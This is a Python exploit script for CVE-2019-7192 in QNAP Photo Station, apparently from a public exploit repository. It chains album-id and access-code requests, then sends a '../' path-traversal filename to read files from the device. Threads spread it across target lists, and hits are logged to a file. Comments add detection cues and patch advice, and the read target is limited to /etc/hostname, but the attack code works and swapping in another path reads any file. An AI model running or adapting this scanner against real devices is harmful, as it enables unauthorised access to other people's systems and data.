forked from VulnExpo/ExploitHunter
QNAP_CVE-2019-7192_Exploit.py
# Author: VulnExpo
# Date: 2023-12-22
import requests
import argparse
import threading
import re
# Silence urllib3's InsecureRequestWarning: every request in this file is sent
# with verify=False, so server certificates are never validated and a reply
# cannot be tied to the intended host.
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
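def check_for_vulnerability(url, proxies=None, success_file=None):
    """Probe one QNAP Photo Station base URL for the CVE-2019-7192 file read.

    The probe is three requests sent on a single ``requests.Session``:

    1. POST ``/photo/p/api/album.php`` with ``a=setSlideshow`` and take the
       album id from the ``<output>`` element of the reply.
    2. GET ``/photo/slideshow.php?album=<id>`` and take the access code from
       the ``encodeURIComponent('...')`` call in the returned page.
    3. POST ``/photo/p/api/video.php`` with ``a=caption``, both values and a
       relative ``filename``.

    Step 3 requests ``/etc/hostname``. That file is enough to show whether
    the read works and keeps password hashes out of the console output and
    out of ``success_file``.

    For detection: the three paths above requested in this order by one
    client, with the fixed header set below (Firefox/59.0 User-Agent and the
    misspelled ``appication/xml`` Accept value), are what this probe looks
    like in web-server or proxy logs. A ``filename`` form field containing
    ``../`` sequences is the part to alert on. The lasting fix is the vendor
    update of Photo Station for this CVE; until it is installed, keep the
    Photo Station web interface off untrusted networks.

    Args:
        url: Base URL of the device; request paths are appended to it as-is.
        proxies: Accepted for interface compatibility; see the note in the
            body.
        success_file: Path the result record is appended to. Nothing is
            written when it is ``None``.

    Returns:
        ``True`` when all three requests returned HTTP 200 and both tokens
        were found, otherwise ``False``. A ``True`` result still needs the
        printed response body to be read by a person: the status code alone
        does not prove that file content came back.
    """
    # Non-sensitive marker file used as evidence of the read.
    probe_path = './../../../../../etc/hostname'
    try:
        headers = {
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0",
            "Accept": "text/html,application/xhtml+xml,appication/xml;q=0.9,*/*;q=0.8",
            "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Accept-Encoding": "gzip, deflate",
            "Connection": "close",
            "Upgrade-Insecure-Requests": "1",
            "Pragma": "no-cache",
            "Cache-Control": "no-cache",
            "Content-Type": "application/x-www-form-urlencoded"
        }
        # NOTE(review): `proxies` is never applied to this session, so the
        # value passed in by the caller has no effect on the requests below.
        req = requests.Session()

        # Step 1: obtain the album id.
        print("=" * 65)
        post_data = {'a': 'setSlideshow', 'f': 'qsamplealbum'}
        album_id_response = req.post(url + "/photo/p/api/album.php", data=post_data, headers=headers, verify=False, timeout=10)
        if album_id_response.status_code != 200:
            print("album id not found \n\033[91mnot vulnerable\033[0m")
            return False
        album_id_match = re.search('(?<=<output>).*?(?=</output>)', album_id_response.text)
        if album_id_match is None:
            # A 200 reply without an <output> element (any unrelated web
            # server) used to surface as an AttributeError on None.
            print("album id not found \n\033[91mnot vulnerable\033[0m")
            return False
        album_id = album_id_match.group()

        # Step 2: obtain the access code embedded in the slideshow page.
        access_code_response = req.get(url + "/photo/slideshow.php?album=" + album_id, headers=headers, verify=False, timeout=10)
        if access_code_response.status_code != 200:
            print("slideshow not found \n\033[91mnot vulnerable\033[0m")
            return False
        access_code_match = re.search("(?<=encodeURIComponent\\(').*?(?=')", access_code_response.text)
        if access_code_match is None:
            print("access code not found \n\033[91mnot vulnerable\033[0m")
            return False
        access_code = access_code_match.group()

        def get_file_content(file):
            """Request *file* through the caption action and record the reply."""
            post_data = {'album': album_id, 'a': 'caption', 'ac': access_code, 'f': 'UMGObv', 'filename': file}
            file_read_response = req.post(url + "/photo/p/api/video.php", data=post_data, headers=headers, verify=False, timeout=10)
            if file_read_response.status_code != 200:
                # Same rule as steps 1 and 2: a non-200 reply is not logged
                # as a success.
                print("file read failed \n\033[91mnot vulnerable\033[0m")
                return False
            print(f"目标URL: {url}, 响应内容: {file_read_response.text}")
            if success_file:
                # One write per record keeps a record's lines together when
                # several threads append to the same file.
                with open(success_file, 'a') as s_file:
                    s_file.write(
                        "=" * 65 + "\n"
                        + f"目标URL: {url}\n"
                        + f"响应内容: {file_read_response.text}\n\n"
                    )
            return True

        return get_file_content(probe_path)
    except Exception as e:
        # Per-target boundary: a failure on one target (timeout, connection
        # error, file error) must not stop the remaining targets.
        print(f"发生异常:{e}")
        return False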
def scan_targets(targets, proxies=None, success_file=None):
    """Run ``check_for_vulnerability`` on every entry of *targets*, in order.

    Surrounding whitespace is stripped from each entry first, which removes
    the newline that entries read from a file still carry. The result of
    each check is discarded; ``proxies`` and ``success_file`` are passed
    through unchanged.
    """
    for raw_target in targets:
        check_for_vulnerability(raw_target.strip(), proxies, success_file)
def multi_threaded_scan(urls, proxies=None, success_file=None, num_threads=4):
    """Split *urls* across ``num_threads`` threads and wait for all of them.

    Thread ``i`` receives the slice ``urls[i::num_threads]`` and hands it to
    ``scan_targets``. All threads are started before any is joined. With
    ``num_threads`` of zero or less no thread is created and the call
    returns without scanning anything.
    """
    workers = [
        threading.Thread(
            target=scan_targets,
            args=(urls[offset::num_threads], proxies, success_file),
        )
        for offset in range(num_threads)
    ]
    for worker in workers:
        worker.start()
    for worker in workers:
        worker.join()
if __name__ == '__main__':
    # Command-line entry point: build the target list, then scan it.
    # NOTE(review): the description names the remote-code-execution CVE; the
    # probe in this file only requests a file from the device.
    parser = argparse.ArgumentParser(
        description="QNAP Photo Station远程代码执行漏洞CVE-2019-7192"
    )
    parser.add_argument("-u", "--url", help="目标URL")
    parser.add_argument(
        "-f", "--file", default="url.txt", help="目标URL列表,默认为url.txt"
    )
    parser.add_argument(
        "-t", "--threads", type=int, default=4, help="线程数,默认为4"
    )
    parser.add_argument(
        "-p", "--proxy", help="代理服务器地址(例如:http://localhost:8080)"
    )
    args = parser.parse_args()

    # -f defaults to url.txt, so this guard only fires when -f is given an
    # empty value and -u is absent.
    if not (args.url or args.file):
        print("请使用 -u 指定要扫描的目标URL或使用默认文件 url.txt。")
        exit(1)

    # A single -u target takes precedence over the list file.
    if args.url:
        urls = [args.url]
    else:
        with open(args.file, 'r') as target_list:
            urls = target_list.readlines()

    success_file = 'success_targets.txt'

    # The same proxy address is used for both schemes.
    if args.proxy:
        proxies = {"http": args.proxy, "https": args.proxy}
    else:
        proxies = None

    multi_threaded_scan(urls, proxies, success_file, args.threads)
    # Printed unconditionally: it does not mean any target was recorded.
    print("扫描完成,成功的目标已保存到 success_targets.txt 文件中。")